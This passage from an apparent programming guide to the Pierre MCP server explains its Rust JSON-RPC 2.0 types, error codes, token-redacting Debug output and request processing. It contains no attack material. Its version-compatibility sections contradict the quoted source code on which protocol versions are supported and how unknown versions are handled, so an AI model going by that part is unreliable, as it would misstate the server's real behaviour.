Source: src/jsonrpc/mod.rs:51-78
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Request
///
/// This is the unified request structure used by all protocols.
/// Protocol-specific extensions (like MCP/A2A's `auth_token`) are included as optional fields.
#[derive(Clone, Serialize, Deserialize)]
pub struct JsonRpcRequest {
/// JSON-RPC version (always "2.0")
pub jsonrpc: String,
/// Method name to invoke
pub method: String,
/// Optional parameters for the method
#[serde(skip_serializing_if = "Option::is_none")]
pub params: Option<Value>,
/// Request identifier (for correlation)
#[serde(skip_serializing_if = "Option::is_none")]
pub id: Option<Value>,
/// Authorization header value (Bearer token) - MCP/A2A extension
#[serde(rename = "auth", skip_serializing_if = "Option::is_none", default)]
pub auth_token: Option<String>,
/// Optional HTTP headers for tenant context and other metadata - MCP extension
#[serde(skip_serializing_if = "Option::is_none", default)]
pub headers: Option<HashMap<String, Value>>,
/// Protocol-specific metadata (additional extensions)
/// Not part of JSON-RPC spec, but useful for future extensions
#[serde(skip_serializing_if = "HashMap::is_empty", default)]
pub metadata: HashMap<String, String>,
}
// Custom Debug implementation that redacts sensitive auth tokens
impl fmt::Debug for JsonRpcRequest {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("JsonRpcRequest")
.field("jsonrpc", &self.jsonrpc)
.field("method", &self.method)
.field("params", &self.params)
.field("id", &self.id)
.field(
"auth_token",
&self.auth_token.as_ref().map(|token| {
// Redact token: show first 10 and last 8 characters, or "[REDACTED]" if short
if token.len() > 20 {
format!("{}...{}", &token[..10], &token[token.len() - 8..])
} else {
"[REDACTED]".to_owned()
}
}),
)
.field("headers", &self.headers)
.field("metadata", &self.metadata)
.finish()
}
}
}
Standard fields (JSON-RPC 2.0 spec):
- `jsonrpc`: Protocol version ("2.0")
- `method`: Method name to invoke (e.g., "initialize", "tools/call")
- `params`: Optional parameters (JSON value)
- `id`: Request identifier for response correlation
Pierre extensions (not in JSON-RPC spec):
- `auth_token`: JWT token for authentication (renamed to "auth" in JSON)
- `headers`: HTTP headers for tenant context (x-tenant-id, etc.)
- `metadata`: Key-value pairs for protocol-specific extensions
Rust Idiom: #[serde(skip_serializing_if = "Option::is_none")]
This attribute omits None values from JSON serialization. A request with no parameters serializes as {"jsonrpc": "2.0", "method": "ping"} instead of {"jsonrpc": "2.0", "method": "ping", "params": null}. This reduces message size and improves readability.
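The omission behavior can be sketched without serde at all; the following hand-rolled serializer (hypothetical, for illustration only) shows the same principle — a `None` field produces no key, rather than a `null` value:

```rust
// Minimal sketch (no serde) of the omission behavior: when params is
// None, the "params" key is absent entirely, not serialized as null.
fn serialize_request(method: &str, params: Option<&str>) -> String {
    match params {
        Some(p) => format!(r#"{{"jsonrpc":"2.0","method":"{method}","params":{p}}}"#),
        None => format!(r#"{{"jsonrpc":"2.0","method":"{method}"}}"#),
    }
}
```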
Custom Debug Implementation
The JsonRpcRequest provides a custom Debug impl that redacts auth tokens:
#![allow(unused)]
fn main() {
// Security: Custom Debug redacts sensitive tokens
impl fmt::Debug for JsonRpcRequest {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("JsonRpcRequest")
.field("auth_token", &self.auth_token.as_ref().map(|token| {
if token.len() > 20 {
format!("{}...{}", &token[..10], &token[token.len() - 8..])
} else {
"[REDACTED]".to_owned()
}
}))
// ... other fields
.finish()
}
}
}
Security: This prevents JWT tokens from appearing in debug logs. If a developer calls dbg!(request) or logs {:?}, the token shows as "eyJhbGc...V6T6QMBv" instead of the full token.
Rust Idiom: Manual Debug implementation
Deriving Debug would print the full auth token. By implementing Debug manually, we control exactly what gets logged. This is a common pattern for types containing secrets.
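The same idiom applies to any type holding a secret. A minimal standalone sketch (the `ApiCredential` type is hypothetical, not from the Pierre codebase):

```rust
use std::fmt;

// Hypothetical credential type demonstrating the manual-Debug idiom:
// the secret never reaches `{:?}` output.
struct ApiCredential {
    key_id: String,
    secret: String,
}

impl fmt::Debug for ApiCredential {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        f.debug_struct("ApiCredential")
            .field("key_id", &self.key_id)
            .field("secret", &"[REDACTED]") // never print the real value
            .finish()
    }
}
```

With this in place, `dbg!` and `{:?}` logging are safe by construction — no call site can accidentally leak the secret.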
Request Constructors
The platform provides builder methods for creating requests:
Source: src/jsonrpc/mod.rs:142-197
#![allow(unused)]
fn main() {
impl JsonRpcRequest {
/// Create a new JSON-RPC request
#[must_use]
pub fn new(method: impl Into<String>, params: Option<Value>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: Some(Value::Number(1.into())),
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Create a new request with a specific ID
#[must_use]
pub fn with_id(method: impl Into<String>, params: Option<Value>, id: Value) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: Some(id),
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Create a notification (no ID, no response expected)
#[must_use]
pub fn notification(method: impl Into<String>, params: Option<Value>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: None,
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Add metadata to the request
#[must_use]
pub fn with_metadata(mut self, key: impl Into<String>, value: impl Into<String>) -> Self {
self.metadata.insert(key.into(), value.into());
self
}
/// Get metadata value
#[must_use]
pub fn get_metadata(&self, key: &str) -> Option<&String> {
self.metadata.get(key)
}
}
}
Usage patterns:
#![allow(unused)]
fn main() {
// Standard request with auto-generated ID
let request = JsonRpcRequest::new("initialize", Some(params));
// Request with specific ID for correlation
let request = JsonRpcRequest::with_id("tools/call", Some(params), Value::String("req-123".into()));
// Notification (fire-and-forget, no response expected)
let notification = JsonRpcRequest::notification("progress", Some(progress_data));
// Request with metadata
let request = JsonRpcRequest::new("initialize", Some(params))
.with_metadata("tenant_id", tenant_id.to_string())
.with_metadata("request_source", "web_ui");
}
Rust Idiom: Builder pattern with #[must_use]
The with_metadata method consumes self and returns the modified Self, enabling method chaining. The #[must_use] attribute warns if the returned value is ignored (preventing bugs where you call request.with_metadata(...) without assigning the result).
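A stripped-down version of this consuming-builder pattern, using only the standard library (the `Request` type here is a simplified stand-in, not the real `JsonRpcRequest`):

```rust
use std::collections::HashMap;

// Simplified stand-in showing the consuming-builder idiom.
#[derive(Debug)]
struct Request {
    method: String,
    metadata: HashMap<String, String>,
}

impl Request {
    #[must_use]
    fn new(method: impl Into<String>) -> Self {
        Self { method: method.into(), metadata: HashMap::new() }
    }

    // Consumes self and returns it, enabling chaining. Ignoring the
    // return value would discard the insertion, hence #[must_use].
    #[must_use]
    fn with_metadata(mut self, key: impl Into<String>, value: impl Into<String>) -> Self {
        self.metadata.insert(key.into(), value.into());
        self
    }
}
```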
Response Structure
A JSON-RPC response represents the result of a method call:
Source: src/jsonrpc/mod.rs:105-257
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Response
///
/// Represents a successful response or an error.
/// Exactly one of `result` or `error` must be present.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonRpcResponse {
/// JSON-RPC version (always "2.0")
pub jsonrpc: String,
/// Result of the method call (mutually exclusive with error)
#[serde(skip_serializing_if = "Option::is_none")]
pub result: Option<Value>,
/// Error information (mutually exclusive with result)
#[serde(skip_serializing_if = "Option::is_none")]
pub error: Option<JsonRpcError>,
/// Request identifier for correlation
pub id: Option<Value>,
}
impl JsonRpcResponse {
/// Create a success response
#[must_use]
pub fn success(id: Option<Value>, result: Value) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: Some(result),
error: None,
id,
}
}
/// Create an error response
#[must_use]
pub fn error(id: Option<Value>, code: i32, message: impl Into<String>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: None,
error: Some(JsonRpcError {
code,
message: message.into(),
data: None,
}),
id,
}
}
/// Create an error response with additional data
#[must_use]
pub fn error_with_data(
id: Option<Value>,
code: i32,
message: impl Into<String>,
data: Value,
) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: None,
error: Some(JsonRpcError {
code,
message: message.into(),
data: Some(data),
}),
id,
}
}
/// Check if this is a success response
#[must_use]
pub const fn is_success(&self) -> bool {
self.error.is_none() && self.result.is_some()
}
/// Check if this is an error response
#[must_use]
pub const fn is_error(&self) -> bool {
self.error.is_some()
}
}
}
Invariant: Exactly one of result or error must be Some. The JSON-RPC spec forbids responses with both fields set or both fields absent.
Success response example:
{
"jsonrpc": "2.0",
"result": {
"tools": [...]
},
"id": 1
}
Error response example:
{
"jsonrpc": "2.0",
"error": {
"code": -32601,
"message": "Method not found"
},
"id": 1
}
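The "exactly one of `result` or `error`" invariant is easy to express as a standalone check. A sketch using plain `&str` stand-ins for the JSON values:

```rust
// Spec invariant: a response carries exactly one of result or error.
// Both present or both absent is invalid JSON-RPC 2.0.
fn is_valid_response(result: Option<&str>, error: Option<&str>) -> bool {
    matches!(
        (result, error),
        (Some(_), None) | (None, Some(_)) // exactly one side present
    )
}
```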
Error Structure
JSON-RPC errors contain a numeric code, human-readable message, and optional data:
Source: src/jsonrpc/mod.rs:126-140
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Error Object
///
/// Standard error structure with code, message, and optional data.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonRpcError {
/// Error code (standard codes: -32700 to -32600)
pub code: i32,
/// Human-readable error message
pub message: String,
/// Additional error information
#[serde(skip_serializing_if = "Option::is_none")]
pub data: Option<Value>,
}
}
Source: src/jsonrpc/mod.rs:259-279
#![allow(unused)]
fn main() {
impl JsonRpcError {
/// Create a new error
#[must_use]
pub fn new(code: i32, message: impl Into<String>) -> Self {
Self {
code,
message: message.into(),
data: None,
}
}
/// Create an error with data
#[must_use]
pub fn with_data(code: i32, message: impl Into<String>, data: Value) -> Self {
Self {
code,
message: message.into(),
data: Some(data),
}
}
}
}
Fields:
- `code`: Integer error code (negative values reserved by spec)
- `message`: Human-readable description
- `data`: Optional structured error details (stack trace, validation errors, etc.)
Standard Error Codes
JSON-RPC 2.0 defines standard error codes in the -32700 to -32600 range:
Source: src/jsonrpc/mod.rs:281-303
#![allow(unused)]
fn main() {
/// Standard JSON-RPC error codes
pub mod error_codes {
/// Parse error - Invalid JSON
pub const PARSE_ERROR: i32 = -32700;
/// Invalid Request - Invalid JSON-RPC
pub const INVALID_REQUEST: i32 = -32600;
/// Method not found
pub const METHOD_NOT_FOUND: i32 = -32601;
/// Invalid params
pub const INVALID_PARAMS: i32 = -32602;
/// Internal error
pub const INTERNAL_ERROR: i32 = -32603;
/// Server error range start
pub const SERVER_ERROR_START: i32 = -32000;
/// Server error range end
pub const SERVER_ERROR_END: i32 = -32099;
}
}
Error code ranges:
- `-32700`: Parse error (malformed JSON)
- `-32600`: Invalid request (valid JSON, invalid JSON-RPC)
- `-32601`: Method not found (unknown method name)
- `-32602`: Invalid params (method exists, params are wrong)
- `-32603`: Internal error (server-side failure)
- `-32000` to `-32099`: Server-specific errors (application-defined)
Usage example:
#![allow(unused)]
fn main() {
use pierre_mcp_server::jsonrpc::{JsonRpcResponse, error_codes};
// Method not found
let response = JsonRpcResponse::error(
Some(request_id),
error_codes::METHOD_NOT_FOUND,
"Method 'unknown_method' not found"
);
// Invalid params with error details
let response = JsonRpcResponse::error_with_data(
Some(request_id),
error_codes::INVALID_PARAMS,
"Missing required parameter 'provider'",
serde_json::json!({
"required_params": ["provider"],
"received_params": ["limit", "offset"]
})
);
}
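For logging and diagnostics it is often handy to map a code back to its spec name. A std-only sketch (the `error_name` helper is illustrative, not part of Pierre):

```rust
// Map standard JSON-RPC error codes to their spec names; the
// -32000..=-32099 band is reserved for application-defined errors.
fn error_name(code: i32) -> &'static str {
    match code {
        -32700 => "Parse error",
        -32600 => "Invalid Request",
        -32601 => "Method not found",
        -32602 => "Invalid params",
        -32603 => "Internal error",
        -32099..=-32000 => "Server error",
        _ => "Unknown",
    }
}
```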
Request Correlation with IDs
The id field correlates requests with responses in bidirectional communication:
Client ────────────────────────► Server
Request: {
"id": 1,
"method": "initialize"
}
Client ◄──────────────────────── Server
Response: {
"id": 1,
"result": {...}
}
Client ────────────────────────► Server
Request: {
"id": 2,
"method": "tools/list"
}
Client ◄──────────────────────── Server
Response: {
"id": 2,
"result": {...}
}
Correlation rules:
- Response `id` must match request `id` exactly
- `id` can be string, number, or null (but not missing)
- Notifications have no `id` (no response expected)
- Server can process requests out-of-order (async)
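Because responses may arrive out of order, a client typically keeps a table of pending calls keyed by `id`. A std-only correlation sketch (all names here are hypothetical):

```rust
use std::collections::HashMap;

// Client-side correlation table: pending calls keyed by numeric id, so
// out-of-order responses still find their originating request.
struct PendingCalls {
    next_id: u64,
    in_flight: HashMap<u64, String>, // id -> method awaiting a response
}

impl PendingCalls {
    fn new() -> Self {
        Self { next_id: 1, in_flight: HashMap::new() }
    }

    // Allocate a fresh id and remember which method it belongs to.
    fn register(&mut self, method: &str) -> u64 {
        let id = self.next_id;
        self.next_id += 1;
        self.in_flight.insert(id, method.to_owned());
        id
    }

    // Match an incoming response to its request; arrival order is irrelevant.
    fn complete(&mut self, id: u64) -> Option<String> {
        self.in_flight.remove(&id)
    }
}
```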
Rust Idiom: Option<Value> for flexible ID types
Using serde_json::Value allows IDs to be:
#![allow(unused)]
fn main() {
Some(Value::Number(1.into())) // Numeric ID
Some(Value::String("req-123".into())) // String ID
Some(Value::Null) // Null ID (valid per spec)
None // Notification (no response)
}
Notifications (Fire-and-forget)
Notifications are requests without an id field. The server does not send a response:
Use cases:
- Progress updates (`notifications/progress`)
- Cancellation signals (`notifications/cancelled`)
- Log messages (`logging/logMessage`)
- Events that don’t require acknowledgment
Example:
{
"jsonrpc": "2.0",
"method": "notifications/progress",
"params": {
"progressToken": "tok-123",
"progress": 50,
"total": 100
}
}
Creating notifications:
#![allow(unused)]
fn main() {
let notification = JsonRpcRequest::notification(
"notifications/progress",
Some(serde_json::json!({
"progressToken": token,
"progress": current,
"total": total
}))
);
}
Rust Idiom: Pattern matching on id
Handlers distinguish notifications from requests:
#![allow(unused)]
fn main() {
match request.id {
None => {
// Notification - process without sending response
handle_notification(request);
}
Some(id) => {
// Request - send response with matching ID
let result = handle_request(request);
JsonRpcResponse::success(Some(id), result)
}
}
}
MCP Extensions to JSON-RPC
Pierre extends JSON-RPC with additional fields for authentication and multi-tenancy:
`auth_token` Field
The auth_token field carries JWT authentication:
#![allow(unused)]
fn main() {
#[serde(rename = "auth", skip_serializing_if = "Option::is_none", default)]
pub auth_token: Option<String>,
}
JSON representation (note rename to “auth”):
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {...},
"id": 1,
"auth": "eyJhbGciOiJSUzI1NiIs..."
}
Note: The auth_token field (Rust name) serializes as "auth" (JSON name) via #[serde(rename = "auth")]. This keeps JSON messages concise while maintaining clear Rust naming.
Headers Field
The headers field carries HTTP-like metadata:
#![allow(unused)]
fn main() {
#[serde(skip_serializing_if = "Option::is_none", default)]
pub headers: Option<HashMap<String, Value>>,
}
JSON representation:
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {...},
"id": 1,
"headers": {
"x-tenant-id": "550e8400-e29b-41d4-a716-446655440000",
"x-tenant-name": "Acme Corp"
}
}
Use cases:
- Tenant identification (`x-tenant-id`, `x-tenant-name`)
- Request tracing (`x-request-id`)
- Feature flags (`x-enable-experimental`)
Metadata Field
The metadata field provides protocol-specific extensions:
#![allow(unused)]
fn main() {
#[serde(skip_serializing_if = "HashMap::is_empty", default)]
pub metadata: HashMap<String, String>,
}
JSON representation:
{
"jsonrpc": "2.0",
"method": "initialize",
"params": {...},
"id": 1,
"metadata": {
"client_version": "1.2.3",
"platform": "macos",
"locale": "en-US"
}
}
Rust Idiom: #[serde(skip_serializing_if = "HashMap::is_empty")]
Empty hashmaps are omitted from JSON. A request with no metadata serializes without the "metadata" key, reducing message size.
MCP Protocol Implementation
The Pierre platform uses these JSON-RPC foundations to implement MCP:
Source: src/mcp/protocol.rs:40-48
#![allow(unused)]
fn main() {
/// MCP protocol handlers
pub struct ProtocolHandler;
// Re-export types from multitenant module to avoid duplication
pub use super::multitenant::{McpError, McpRequest, McpResponse};
/// Default ID for notifications and error responses that don't have a request ID
fn default_request_id() -> Value {
serde_json::Value::Number(serde_json::Number::from(0))
}
impl ProtocolHandler {
/// Supported MCP protocol versions (in preference order)
const SUPPORTED_VERSIONS: &'static [&'static str] = &["2025-06-18", "2024-11-05"];
}
Type aliases:
#![allow(unused)]
fn main() {
pub use super::multitenant::{McpError, McpRequest, McpResponse};
}
The McpRequest and McpResponse types are aliases for JsonRpcRequest and JsonRpcResponse. This shows how Pierre’s unified JSON-RPC implementation supports multiple protocols (MCP, A2A) without duplication.
Initialize Handler
The initialize method validates protocol versions:
Source: src/mcp/protocol.rs:177-247
#![allow(unused)]
fn main() {
/// Internal initialize handler
fn handle_initialize_internal(
request: McpRequest,
resources: Option<&Arc<ServerResources>>,
) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
// Parse initialize request parameters
let Some(init_request) = request
.params
.as_ref()
.and_then(|params| serde_json::from_value::<InitializeRequest>(params.clone()).ok())
else {
return McpResponse::error(
Some(request_id),
ERROR_INVALID_PARAMS,
"Invalid initialize request parameters".to_owned(),
);
};
// Validate client protocol version
let client_version = &init_request.protocol_version;
let negotiated_version = if Self::SUPPORTED_VERSIONS.contains(&client_version.as_str()) {
// Use client version if supported
client_version.clone()
} else {
// Return error for unsupported versions
let supported_versions = Self::SUPPORTED_VERSIONS.join(", ");
return McpResponse::error(
Some(request_id),
ERROR_VERSION_MISMATCH,
format!("{MSG_VERSION_MISMATCH}. Client version: {client_version}, Supported versions: {supported_versions}")
);
};
info!(
"MCP version negotiated: {} (client: {}, server supports: {:?})",
negotiated_version,
client_version,
Self::SUPPORTED_VERSIONS
);
// Create successful initialize response with negotiated version
let init_response = if let Some(resources) = resources {
// Use dynamic HTTP port from server configuration
InitializeResponse::new_with_ports(
negotiated_version,
crate::constants::protocol::server_name_multitenant(),
SERVER_VERSION.to_owned(),
resources.config.http_port,
)
} else {
// Fallback to default (hardcoded port)
InitializeResponse::new(
negotiated_version,
crate::constants::protocol::server_name_multitenant(),
SERVER_VERSION.to_owned(),
)
};
match serde_json::to_value(&init_response) {
Ok(result) => McpResponse::success(Some(request_id), result),
Err(e) => {
error!("Failed to serialize initialize response: {}", e);
McpResponse::error(
Some(request_id),
ERROR_SERIALIZATION,
format!("{MSG_SERIALIZATION}: {e}"),
)
}
}
}
}
Protocol negotiation:
- Client sends `{"protocol_version": "2025-06-18"}` in the initialize request
- Server checks if the version is in `SUPPORTED_VERSIONS`
- If supported, use the client’s version (allows newer clients)
- If unsupported, return `ERROR_VERSION_MISMATCH` with the supported versions list
This forward-compatibility pattern allows adding new protocol versions without breaking old clients.
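The contains-check at the heart of this negotiation can be sketched in isolation. This is a simplified stand-alone version of the logic shown above, not the production handler:

```rust
// Version negotiation sketch: accept the client's version when the
// server supports it; otherwise report the full supported set.
const SUPPORTED_VERSIONS: &[&str] = &["2025-06-18", "2024-11-05"];

fn negotiate_version(client_version: &str) -> Result<String, String> {
    if SUPPORTED_VERSIONS.contains(&client_version) {
        // Use the client's version (allows older clients on newer servers).
        Ok(client_version.to_owned())
    } else {
        Err(format!(
            "Unsupported version {client_version}; server supports: {}",
            SUPPORTED_VERSIONS.join(", ")
        ))
    }
}
```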
Ping Handler
The simplest MCP method returns an empty result:
Source: src/mcp/protocol.rs:250-253
#![allow(unused)]
fn main() {
/// Handle ping request
pub fn handle_ping(request: McpRequest) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::success(Some(request_id), serde_json::json!({}))
}
}
Usage:
Request: {"jsonrpc": "2.0", "method": "ping", "id": 1}
Response: {"jsonrpc": "2.0", "result": {}, "id": 1}
Clients use ping to test connectivity and measure latency.
tools/list Handler
The tools/list method returns available MCP tools:
Source: src/mcp/protocol.rs:256-261
#![allow(unused)]
fn main() {
/// Handle tools list request
pub fn handle_tools_list(request: McpRequest) -> McpResponse {
let tools = get_tools();
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::success(Some(request_id), serde_json::json!({ "tools": tools }))
}
}
Response structure:
{
"jsonrpc": "2.0",
"result": {
"tools": [
{
"name": "get_activities",
"description": "Fetch fitness activities from connected providers",
"inputSchema": {...}
},
...
]
},
"id": 1
}
Error Handling Patterns
The platform uses consistent error handling across JSON-RPC methods:
Method Not Found
Source: src/mcp/protocol.rs:371-378
#![allow(unused)]
fn main() {
/// Handle unknown method request
pub fn handle_unknown_method(request: McpRequest) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::error(
Some(request_id),
ERROR_METHOD_NOT_FOUND,
format!("Unknown method: {}", request.method),
)
}
}
Invalid Params
#![allow(unused)]
fn main() {
return McpResponse::error(
Some(request_id),
ERROR_INVALID_PARAMS,
"Invalid initialize request parameters".to_owned(),
);
}
Authentication Errors
#![allow(unused)]
fn main() {
return McpResponse::error(
Some(request_id),
ERROR_AUTHENTICATION,
"Authentication token required".to_owned(),
);
}
Pattern: All error responses follow the same structure:
- Extract request ID (or use default for notifications)
- Call `McpResponse::error()` with appropriate code
- Include actionable error message
- Optionally add `data` field with details
MCP Version Compatibility
Pierre implements version negotiation during the initialize handshake to ensure compatibility with different MCP client versions.
Version Negotiation Flow
Client Server
│ │
│ ──── initialize ──────────────► │
│ { │
│ "method": "initialize", │
│ "params": { │
│ "protocolVersion": "2024-11-05",│
│ "clientInfo": {...} │
│ } │
│ } │
│ │
│ ◄──── initialized ──────────── │
│ { │
│ "result": { │
│ "protocolVersion": "2024-11-05",│ (echo or negotiate down)
│ "serverInfo": {...}, │
│ "capabilities": {...} │
│ } │
│ } │
└──────────────────────────────────────┘
Supported Protocol Versions
| Version | Status | Notes |
|---|---|---|
| 2024-11-05 | Current | Full feature support |
| 2024-10-07 | Supported | Backward compatible |
| 1.0 | Legacy | Basic tool support |
Version Handling Logic
#![allow(unused)]
fn main() {
/// Handle protocol version negotiation
fn negotiate_version(client_version: &str) -> Result<String, ProtocolError> {
match client_version {
// Current version - full support
"2024-11-05" => Ok("2024-11-05".to_owned()),
// Previous version - backward compatible
"2024-10-07" => Ok("2024-10-07".to_owned()),
// Legacy version - limited features
"1.0" | "1" => {
tracing::warn!(
client_version = client_version,
"Client using legacy MCP version, some features unavailable"
);
Ok("1.0".to_owned())
}
// Unknown version - try to continue with current
unknown => {
tracing::warn!(
client_version = unknown,
server_version = "2024-11-05",
"Unknown client version, attempting compatibility"
);
Ok("2024-11-05".to_owned())
}
}
}
}
Capability Negotiation
Different versions expose different capabilities:
#![allow(unused)]
fn main() {
/// Get capabilities for protocol version
fn capabilities_for_version(version: &str) -> ServerCapabilities {
match version {
"2024-11-05" => ServerCapabilities {
tools: true,
resources: true,
prompts: true,
logging: true,
experimental: Some(ExperimentalCapabilities {
a2a: true,
streaming: true,
}),
},
"2024-10-07" => ServerCapabilities {
tools: true,
resources: true,
prompts: false, // Not available in older version
logging: false,
experimental: None,
},
_ => ServerCapabilities::minimal(), // Basic tool support only
}
}
}
Breaking Changes Policy
Pierre follows semantic versioning for API changes:
Breaking changes (require major version bump):
- Removing a tool from the registry
- Changing tool parameter types
- Changing response structure
- Removing capabilities
Non-breaking changes (minor version):
- Adding new tools
- Adding optional parameters
- Adding new capabilities
- Adding new response fields
Deprecation process:
- Mark feature as deprecated in current version
- Log warnings when deprecated features are used
- Remove in next major version
- Document migration path in release notes
Client Version Detection
Pierre logs client information for compatibility tracking:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ClientInfo {
pub name: String,
pub version: String,
}
// Example client identification
// Claude Desktop: {"name": "claude-desktop", "version": "0.7.0"}
// VSCode Copilot: {"name": "vscode-copilot", "version": "1.2.3"}
}
Forward Compatibility
For unknown future versions, Pierre:
- Logs a warning about unknown version
- Responds with current server version
- Excludes experimental features
- Allows basic tool operations
This ensures new clients can still use Pierre even if the server hasn’t been updated.
Key Takeaways
- JSON-RPC 2.0 foundation: Lightweight RPC protocol with 4 message types (request, response, error, notification). Transport-agnostic and bidirectional.
- Unified implementation: Pierre uses one JSON-RPC implementation for MCP and A2A protocols, eliminating duplication.
- Request structure: Contains `jsonrpc`, `method`, `params`, and `id`. Pierre adds `auth_token`, `headers`, and `metadata` for authentication and multi-tenancy.
- Response structure: Contains `jsonrpc`, `result` or `error` (mutually exclusive), and `id` matching the request.
- Error codes: Standard codes (-32700 to -32600) for protocol errors. Server-specific codes (-32000 to -32099) for application errors.
- Request correlation: The `id` field correlates requests with responses in async bidirectional communication. Notifications omit `id` (no response expected).
- Custom Debug implementation: `JsonRpcRequest` redacts auth tokens in debug output to prevent token leakage in logs.
- Protocol versioning: The MCP initialize method negotiates protocol version with the client, allowing forward compatibility.
- Extension fields: Pierre extends JSON-RPC with optional fields while maintaining spec compliance (fields are skipped if absent).
- Type safety: Rust’s type system with serde ensures valid JSON-RPC messages. Invalid messages are caught at deserialization.
Next Chapter: Chapter 10: MCP Protocol Deep Dive - Request Flow - Learn how the Pierre platform routes MCP requests through authentication, tenant isolation, tool registry, and response serialization.
Chapter 10: MCP Protocol Deep Dive - Request Flow
MCP Request Lifecycle
Every MCP request flows through multiple processing layers:
┌────────────────────────────────────────────────────────────┐
│ MCP Client Request │
│ {"jsonrpc": "2.0", "method": "tools/call", ...} │
└────────────────────────┬───────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ Transport Layer │ ← HTTP/WebSocket/stdio/SSE
│ (receives JSON bytes) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ JSON Deserialization │ ← Parse to McpRequest
│ serde_json::from_str │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpRequestProcessor │ ← Validate and route
│ handle_request() │
└──────────────────────────┘
│
┌────────────────┴────────────────┐
│ │
▼ ▼
┌─────────────┐ ┌──────────────────┐
│ Notification│ │ Method Routing │
│ (no resp) │ │ initialize │
└─────────────┘ │ ping │
│ tools/list │
│ tools/call ───┐ │
└────────────────┼─┘
│
▼
┌──────────────────────────┐
│ Auth Middleware │
│ - Extract token │
│ - Validate JWT │
│ - Extract user_id │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant Isolation │
│ - Extract tenant_id │
│ - Build TenantContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tool Handler Dispatch │
│ - Route to specific tool│
│ - Execute with context │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Response Serialization │
│ McpResponse → JSON │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Transport Layer │
│ Send JSON bytes │
└──────────────────────────┘
Source: src/mcp/mcp_request_processor.rs:25-76
#![allow(unused)]
fn main() {
/// Processes MCP protocol requests with validation, routing, and execution
pub struct McpRequestProcessor {
resources: Arc<ServerResources>,
}
impl McpRequestProcessor {
/// Create a new MCP request processor
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
/// Handle an MCP request and return a response
pub async fn handle_request(&self, request: McpRequest) -> Option<McpResponse> {
let start_time = std::time::Instant::now();
// Log request with optional truncation
Self::log_request(&request);
// Handle notifications (no response needed)
if request.method.starts_with("notifications/") {
Self::handle_notification(&request);
Self::log_completion("notification", start_time);
return None;
}
// Process request and generate response
let response = match self.process_request(request.clone()).await {
Ok(response) => response,
Err(e) => {
error!(
"Failed to process MCP request: {} | Request: method={}, jsonrpc={}, id={:?}",
e, request.method, request.jsonrpc, request.id
);
error!("Request params: {:?}", request.params);
error!("Full error details: {:#}", e);
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: None,
error: Some(McpError {
code: ERROR_INTERNAL_ERROR,
message: format!("Internal server error: {e}"),
data: None,
}),
}
}
};
Self::log_completion("request", start_time);
Some(response)
}
}
}
Flow:
- Start timer: Capture request start time for performance monitoring
- Log request: Record method, ID, and params (truncated for security)
- Check notifications: If method starts with “notifications/”, handle without response
- Process request: Validate, route, and execute
- Error handling: Convert `Result<McpResponse>` to `McpResponse` with error
- Log completion: Record duration in logs
- Return: `Some(response)` for requests, `None` for notifications
Rust Idiom: Option<McpResponse> return type
The handle_request method returns Option<McpResponse> instead of always returning a response. This explicitly represents “notifications don’t get responses” in the type system. The transport layer can then handle None by not sending anything.
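A minimal sketch of how a transport layer consumes this `Option` (the `Response`, `dispatch`, and `send_if_needed` names are illustrative stand-ins, not Pierre APIs):

```rust
// Transport-side handling sketch: a notification produces None, so
// nothing is written back to the client.
struct Response(String);

fn dispatch(method: &str) -> Option<Response> {
    if method.starts_with("notifications/") {
        None // fire-and-forget: no response expected
    } else {
        Some(Response(format!("handled {method}")))
    }
}

fn send_if_needed(method: &str, wire: &mut Vec<String>) {
    // Only requests produce bytes on the wire.
    if let Some(Response(body)) = dispatch(method) {
        wire.push(body);
    }
}
```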
Request Validation
The platform validates all requests before processing:
Source: src/mcp/mcp_request_processor.rs:96-111
#![allow(unused)]
fn main() {
/// Validate MCP request format and required fields
fn validate_request(request: &McpRequest) -> Result<()> {
if request.jsonrpc != JSONRPC_VERSION {
return Err(AppError::invalid_input(format!(
"Invalid JSON-RPC version: got '{}', expected '{}'",
request.jsonrpc, JSONRPC_VERSION
))
.into());
}
if request.method.is_empty() {
return Err(AppError::invalid_input("Missing method").into());
}
Ok(())
}
}
Validation rules:
- jsonrpc must be exactly "2.0"
- method must not be empty string
- Other fields are optional (validated by method handlers)
Security: Validating jsonrpc version prevents processing malformed or legacy JSON-RPC 1.0 requests.
Method Routing
The processor routes requests to handlers based on the method field:
